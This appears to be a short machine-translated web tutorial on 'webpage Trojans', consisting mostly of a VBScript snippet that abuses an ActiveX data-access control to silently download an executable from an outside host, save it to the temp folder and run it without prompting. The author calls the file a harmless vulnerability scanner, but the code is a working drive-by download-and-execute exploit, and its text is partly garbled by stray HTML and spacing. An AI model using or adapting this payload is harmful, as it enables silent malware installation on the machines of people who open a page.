For those who frequently surf the Internet, they will not be unfamiliar with webpage Trojans. When a website is opened, a Trojan is run inexplicably, although the "Security" setting is included in the "Internet Options, however, the following code does not pop up any information and runs the program directly. Do not believe it, follow me!
(Note: yexj00.exe is a Windows vulnerability scanner and can be used to detect vulnerabilities, not viruses or Trojans .)
Copy codeThe Code is as follows: <script language = "VBScript">
On error resume next
Dl = "<a href =" http://yexj00.5dm.cn/soft/yexj00.exe "target =" _ blank "> http://yexj00.5dm.cn/soft/yexj00.exe </a>"
Set ye = document. createElement ("object ")
YStr = "clsid: BD96C556-65A3-11D0-983A-00C04FC29E36"
Ye. setAttribute "classid", yStr
Set x = ye. CreateObject ("Microsoft. XMLHTTP ","")
Set S = ye. createobject ("ADODB. Stream ","")
S. type = 1
X. Open "GET", dl, False
X. Send
Fname = "win2000leakage scanner .exe"
Set F = ye. createobject ("Scripting. FileSystemObject ","")
Set tmp = F. GetSpecialFolder (2)
Fname = F. BuildPath (tmp, fname)
S. open
S. write x. responseBody
S. savetofile fname, 2
S. close
Set A = ye. createobject ("Shell. Application ","")
A. ShellExecute fname, "", "", "open", 1
</Script>